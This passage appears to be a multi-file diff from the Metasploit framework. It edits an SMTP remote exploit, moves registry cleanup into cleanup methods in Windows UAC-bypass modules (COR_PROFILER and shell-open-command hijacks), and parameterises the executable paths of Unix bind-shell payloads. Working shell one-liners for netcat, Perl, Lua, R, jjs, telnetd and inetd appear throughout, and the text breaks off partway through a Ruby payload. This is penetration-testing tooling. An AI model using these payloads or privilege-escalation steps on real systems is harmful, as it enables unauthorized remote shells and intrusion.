    ehlo_resp.each_line do |line|
      print_status("EHLO: #{line.strip}")
    end
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
    from = datastore['MAILFROM']
    to   = datastore['MAILTO']

-    resp = smtp_send_recv("MAIL FROM: #{from}\r\n")
+    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
    resp ||= 'no response'
    msg = "MAIL: #{resp.strip}"
    if not resp or resp[0,3] != '250'
@@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
      print_status(msg)
    end

-    resp = smtp_send_recv("RCPT TO: #{to}\r\n")
+    resp = raw_send_recv("RCPT TO: #{to}\r\n")
    resp ||= 'no response'
    msg = "RCPT: #{resp.strip}"
    if not resp or resp[0,3] != '250'
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
      print_status(msg)
    end

-    resp = smtp_send_recv("DATA\r\n")
+    resp = raw_send_recv("DATA\r\n")
    resp ||= 'no response'
    msg = "DATA: #{resp.strip}"
    if not resp or resp[0,3] != '354'
@@ -251,21 +251,21 @@ class MetasploitModule < Msf::Exploit::Remote
    sock.put body

    print_status("Ending first message.")
-    buf = smtp_send_recv("\r\n.\r\n")
+    buf = raw_send_recv("\r\n.\r\n")
    # Should be: "552 Message size exceeds maximum permitted\r\n"
    print_status("Result: #{buf.inspect}") if buf

    second_result = ""

    print_status("Sending second message ...")
-    buf = smtp_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
+    buf = raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
    # Should be: "sh-x.x$ " !!
    if buf
      print_status("MAIL result: #{buf.inspect}")
      second_result << buf
    end

-    buf = smtp_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
+    buf = raw_send_recv("RCPT TO: #{datastore['MAILTO']}\r\n")
    # Should be: "sh: RCPT: command not found\n"
    if buf
      print_status("RCPT result: #{buf.inspect}")
@@ -296,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote

    if resp !~ /Summary of my perl/
      print_status("Should have a shell now, sending payload...")
-      buf = smtp_send_recv("\n" + payload.encoded + "\n\n")
+      buf = raw_send_recv("\n" + payload.encoded + "\n\n")
      if buf
        if buf =~ /554 SMTP synchronization error/
          print_error("This target may be patched: #{buf.strip}")
@@ -105,6 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    @reg_keys = []
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -140,31 +141,30 @@ class MetasploitModule < Msf::Exploit::Local

    uuid = SecureRandom.uuid
    vprint_status("UUID = #{uuid}")
-    reg_keys = []
    # This reg key will not hurt anything in windows 10+, but is not required.
    unless sysinfo['OS'] =~ /Windows (2016|10)/
-      reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
+      @reg_keys.push(key_name: "HKCU\\Software\\Classes\\CLSID\\{#{uuid}}\\InprocServer32",
                    value_name: '',
                    value_type: "REG_EXPAND_SZ",
                    value_value: payload_pathname,
                    delete_on_cleanup: false)
    end
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER",
                  value_type: "REG_SZ",
                  value_value: "{#{uuid}}",
                  delete_on_cleanup: false)
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_ENABLE_PROFILING",
                  value_type: "REG_SZ",
                  value_value: "1",
                  delete_on_cleanup: false)
-    reg_keys.push(key_name: "HKCU\\Environment",
+    @reg_keys.push(key_name: "HKCU\\Environment",
                  value_name: "COR_PROFILER_PATH",
                  value_type: "REG_SZ",
                  value_value: payload_pathname,
                  delete_on_cleanup: false)
-    reg_keys.each do |key_hash|
+    @reg_keys.each do |key_hash|
      write_reg_value(key_hash)
    end

@@ -179,15 +179,18 @@ class MetasploitModule < Msf::Exploit::Local
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error(e.to_s)
    end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
    print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    reg_keys.each do |key_hash|
-      remove_reg_value(key_hash)
+  end
+
+  def cleanup
+    if @reg_keys.present?
+      vprint_status("Removing Registry Changes")
+      @reg_keys.each do |key_hash|
+        remove_reg_value(key_hash)
+      end
+      vprint_status("Registry Changes Removed")
    end
-    vprint_status("Registry Changes Removed")
  end

  def check_permissions!
@@ -79,6 +79,8 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    @registry_key = ''
+    @remove_registry_key = false
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -95,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Local
      return
    end

-    registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
-    remove_registry_key = !registry_key_exist?(registry_key)
+    @registry_key = 'HKCU\Software\Classes\Folder\shell\open\command'
+    @remove_registry_key = !registry_key_exist?(@registry_key)

    # get directory locations straight
    win_dir = session.sys.config.getenv('windir')
@@ -116,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
-    write_reg_values(registry_key, reg_command)
+    write_reg_values(@registry_key, reg_command)

    # Upload payload
    vprint_status("Uploading Payload to #{payload_pathname}")
@@ -129,18 +131,21 @@ class MetasploitModule < Msf::Exploit::Local
    rescue ::Exception => e
      print_error("Executing command failed:\n#{e}")
    end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
    print_status("Please wait for session and cleanup....")
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    if remove_registry_key
-      registry_deletekey(registry_key)
-    else
-      registry_deleteval(registry_key, "DelegateExecute")
-      registry_deleteval(registry_key, '')
+  end
+
+  def cleanup
+    if @registry_key.present?
+      vprint_status("Removing Registry Changes")
+      if @remove_registry_key
+        registry_deletekey(@registry_key)
+      else
+        registry_deleteval(@registry_key, "DelegateExecute")
+        registry_deleteval(@registry_key, '')
+      end
+      print_status("Registry Changes Removed")
    end
-    print_status("Registry Changes Removed")
  end

  def check_permissions!
@@ -69,6 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
  end

  def exploit
+    @registry_key = ''
    check_permissions!
    case get_uac_level
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
@@ -103,14 +104,14 @@ class MetasploitModule < Msf::Exploit::Local
    payload = generate_payload_exe
    reg_command = exploit_dir + "cmd.exe /c start #{payload_pathname}"
    vprint_status("reg_command = " + reg_command)
-    registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
+    @registry_key = "HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"

    # make registry changes
    vprint_status("Making Registry Changes")
    begin
-      registry_createkey(registry_key)
-      registry_setvaldata(registry_key, "DelegateExecute", '', "REG_SZ")
-      registry_setvaldata(registry_key, '', reg_command, "REG_SZ")
+      registry_createkey(@registry_key)
+      registry_setvaldata(@registry_key, "DelegateExecute", '', "REG_SZ")
+      registry_setvaldata(@registry_key, '', reg_command, "REG_SZ")
    rescue ::Exception => e
      print_error(e.to_s)
    end
@@ -126,12 +127,15 @@ class MetasploitModule < Msf::Exploit::Local
    rescue ::Exception => e
      print_error(e.to_s)
    end
-    print_warning("This exploit requires manual cleanup of '#{payload_pathname}!")
-    # wait for a few seconds before cleaning up
-    sleep(20)
-    vprint_status("Removing Registry Changes")
-    registry_deletekey(registry_key)
-    vprint_status("Registry Changes Removed")
+    print_warning("This exploit requires manual cleanup of '#{payload_pathname}'")
+  end
+
+  def cleanup
+    if @registry_key.present?
+      vprint_status("Removing Registry Changes")
+      registry_deletekey(@registry_key)
+      vprint_status("Registry Changes Removed")
+    end
  end

  def check_permissions!
@@ -215,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Local

    when 'schedule'
      # Change interval tag, insert into XML
-      if datastore['FREQUENCY'] != 0
+      unless datastore['FREQUENCY'].nil? || datastore['FREQUENCY'] == 0
        minutes = datastore['FREQUENCY']
      else
        print_status("Defaulting frequency to every hour")
@@ -13,21 +13,21 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via BusyBox telnetd)',
-      'Description'   => 'Listen for a connection and spawn a command shell via BusyBox telnetd',
-      'Author'        => 'Matthew Kienow <matthew_kienow[AT]rapid7.com>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnetd',
-      'Payload'       => {
-        'Offsets' => { },
-        'Payload' => ''
-      }
-    ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via BusyBox telnetd)',
+     'Description'   => 'Listen for a connection and spawn a command shell via BusyBox telnetd',
+     'Author'        => 'Matthew Kienow <matthew_kienow[AT]rapid7.com>',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'telnetd',
+     'Payload'       => {
+       'Offsets' => { },
+       'Payload' => ''
+     }
+   ))

    register_options(
      [
@@ -37,7 +37,8 @@ module MetasploitModule

    register_advanced_options(
      [
-        OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'pkill telnetd'])
+        OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'pkill telnetd']),
+        OptString.new('TelnetdPath', [true, 'The path to the telnetd executable', 'telnetd'])
      ]
    )
  end
@@ -54,7 +55,7 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "telnetd -l #{datastore['LOGIN_CMD']} -p #{datastore['LPORT']}"
+    "#{datastore['TelnetdPath']} -l #{datastore['LOGIN_CMD']} -p #{datastore['LPORT']}"
  end

 end
@@ -13,23 +13,29 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (inetd)',
-      'Description'   => 'Listen for a connection and spawn a command shell (persistent)',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'Privileged'    => true,
-      'RequiredCmd'   => 'inetd',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (inetd)',
+     'Description'   => 'Listen for a connection and spawn a command shell (persistent)',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'Privileged'    => true,
+     'RequiredCmd'   => 'inetd',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('InetdPath', [true, 'The path to the inetd executable', 'inetd']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
  end

  #
@@ -52,26 +58,26 @@ module MetasploitModule
      # Create a clean copy of the services file
      "cp /etc/services #{tmp_services};" +

-      # Add our service to the system one
-      "echo #{svc} #{datastore['LPORT']}/tcp>>/etc/services;" +
+        # Add our service to the system one
+        "echo #{svc} #{datastore['LPORT']}/tcp>>/etc/services;" +

-      # Create our inetd configuration file with our service
-      "echo #{svc} stream tcp nowait root /bin/sh sh>#{tmp_inet};" +
+        # Create our inetd configuration file with our service
+        "echo #{svc} stream tcp nowait root #{datastore['ShellPath']} sh>#{tmp_inet};" +

-      # First we try executing inetd without the full path
-      "inetd -s #{tmp_inet} ||" +
+        # First we try executing inetd without the full path
+        "#{datastore['InetdPath']} -s #{tmp_inet} ||" +

-      # Next try the standard inetd path on Linux, Solaris, BSD
-      "/usr/sbin/inetd -s #{tmp_inet} ||" +
+        # Next try the standard inetd path on Linux, Solaris, BSD
+        "/usr/sbin/inetd -s #{tmp_inet} ||" +

-      # Next try the Irix inetd path
-      "/usr/etc/inetd -s #{tmp_inet};" +
+        # Next try the Irix inetd path
+        "/usr/etc/inetd -s #{tmp_inet};" +

-      # Overwrite services with the "clean" version
-      "cp #{tmp_services} /etc/services;" +
+        # Overwrite services with the "clean" version
+        "cp #{tmp_services} /etc/services;" +

-      # Delete our configuration file
-      "rm #{tmp_inet} #{tmp_services};";
+        # Delete our configuration file
+        "rm #{tmp_inet} #{tmp_services};";

    return cmd
  end
@@ -13,29 +13,36 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via jjs)',
-      'Description' => 'Listen for a connection and spawn a command shell via jjs',
-      'Author'      => [
-        'conerpirate', # jjs bind shell
-        'bcoles'       # metasploit
-      ],
-      'References'    => [
-        ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
-        ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
-        ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
-      ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'jjs',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Bind TCP (via jjs)',
+     'Description' => 'Listen for a connection and spawn a command shell via jjs',
+     'Author'      => [
+       'conerpirate', # jjs bind shell
+       'bcoles'       # metasploit
+     ],
+     'References'    => [
+       ['URL', 'https://gtfobins.github.io/gtfobins/jjs/'],
+       ['URL', 'https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/'],
+       ['URL', 'https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html'],
+     ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'jjs',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
-    register_options [
-      OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ])
-    ]
+    register_options(
+      [
+        OptString.new('SHELL', [ true, 'The shell to execute', '/bin/sh' ])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('JJSPath', [true, 'The path to the JJS executable', 'jjs'])
+      ]
+    )
  end

  def generate(_opts = {})
@@ -65,6 +72,6 @@ module MetasploitModule

    minified = jcode.split("\n").map(&:lstrip).join

-    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|jjs}
+    %Q{echo "eval(new java.lang.String(java.util.Base64.decoder.decode('#{Rex::Text.encode_base64(minified)}')));"|#{datastore['JJSPath']}}
  end
 end
@@ -13,25 +13,30 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via Lua)',
-      'Description'   => 'Listen for a connection and spawn a command shell via Lua',
-      'Author'        =>
-        [
-          'xistence <xistence[at]0x90.nl>',
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'lua',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via Lua)',
+     'Description'   => 'Listen for a connection and spawn a command shell via Lua',
+     'Author'        =>
+       [
+         'xistence <xistence[at]0x90.nl>',
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'lua',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('LuaPath', [true, 'The path to the Lua executable', 'lua'])
+      ]
+    )
  end

  #
@@ -46,7 +51,7 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "lua -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
+    "#{datastore['LuaPath']} -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
  end
 end

@@ -13,27 +13,33 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
-      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-      'Author'         =>
-        [
-          'm-1-k-3',
-          'egypt',
-          'juan vazquez'
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
+     'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+     'Author'         =>
+       [
+         'm-1-k-3',
+         'egypt',
+         'juan vazquez'
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
  end

  #
@@ -49,6 +55,6 @@ module MetasploitModule
  #
  def command_string
    backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mkfifo /tmp/#{backpipe}; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+    "mkfifo /tmp/#{backpipe}; (#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} ||#{datastore['NetcatPath']} -l #{datastore['LPORT']})0</tmp/#{backpipe} | #{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
  end
 end
@@ -13,22 +13,28 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
-      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat-e',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
+     'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat-e',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
  end

  #
@@ -43,6 +49,6 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "nc -l -p #{datastore['LPORT']} -e /bin/sh"
+    "#{datastore['NetcatPath']} -l -p #{datastore['LPORT']} -e #{datastore['ShellPath']}"
  end
 end
@@ -13,22 +13,28 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
-      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-      'Author'        => 'hdm',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'netcat-e',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
+     'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+     'Author'        => 'hdm',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'netcat-e',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('NetcatPath', [true, 'The path to the Netcat executable', 'nc']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
+      ]
+    )
  end

  #
@@ -43,6 +49,6 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-    "nc -6 -lp #{datastore['LPORT']} -e /bin/sh"
+    "#{datastore['NetcatPath']} -6 -lp #{datastore['LPORT']} -e #{datastore['ShellPath']}"
  end
 end
@@ -13,22 +13,27 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via Perl)',
-      'Description'   => 'Listen for a connection and spawn a command shell via perl',
-      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via Perl)',
+     'Description'   => 'Listen for a connection and spawn a command shell via perl',
+     'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
  end

  #
@@ -43,7 +48,7 @@ module MetasploitModule
  # Returns the command string to use for execution
  #
  def command_string
-     cmd = "perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'"
+    cmd = "#{datastore['PerlPath']} -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};'"
    return cmd
  end
 end
@@ -13,22 +13,27 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Bind TCP (via perl) IPv6',
-      'Description'   => 'Listen for a connection and spawn a command shell via perl',
-      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Bind TCP (via perl) IPv6',
+     'Description'   => 'Listen for a connection and spawn a command shell via perl',
+     'Author'        => ['Samy <samy[at]samy.pl>', 'cazz'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
  end

  #
@@ -44,7 +49,7 @@ module MetasploitModule
  #
  def command_string

-    cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
+    cmd = "#{datastore['PerlPath']} -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"

    return cmd
  end
@@ -14,18 +14,23 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via R)',
-      'Description' => 'Continually listen for a connection and spawn a command shell via R',
-      'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'R',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
-    ))
+     'Name'        => 'Unix Command Shell, Bind TCP (via R)',
+     'Description' => 'Continually listen for a connection and spawn a command shell via R',
+     'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::BindTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'R',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+          ))
+    register_advanced_options(
+      [
+        OptString.new('RPath', [true, 'The path to the R executable', 'R'])
+      ]
+    )
  end

  def generate(_opts = {})
@@ -33,12 +38,12 @@ module MetasploitModule
  end

  def prepends(r_string)
-   return "R -e \"#{r_string}\""
+    return "#{datastore['RPath']} -e \"#{r_string}\""
  end

  def r_string
    return "s<-socketConnection(port=#{datastore['LPORT']}," +
-    "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
-    "(pipe(readLines(s,1))),s)}"
+      "blocking=TRUE,server=TRUE,open='r+');while(TRUE){writeLines(readLines" +
+      "(pipe(readLines(s,1))),s)}"
  end
 end
@@ -13,18 +13,23 @@ module MetasploitModule

  def initialize(info = {})
    super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Bind TCP (via Ruby)',
-      'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::BindTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
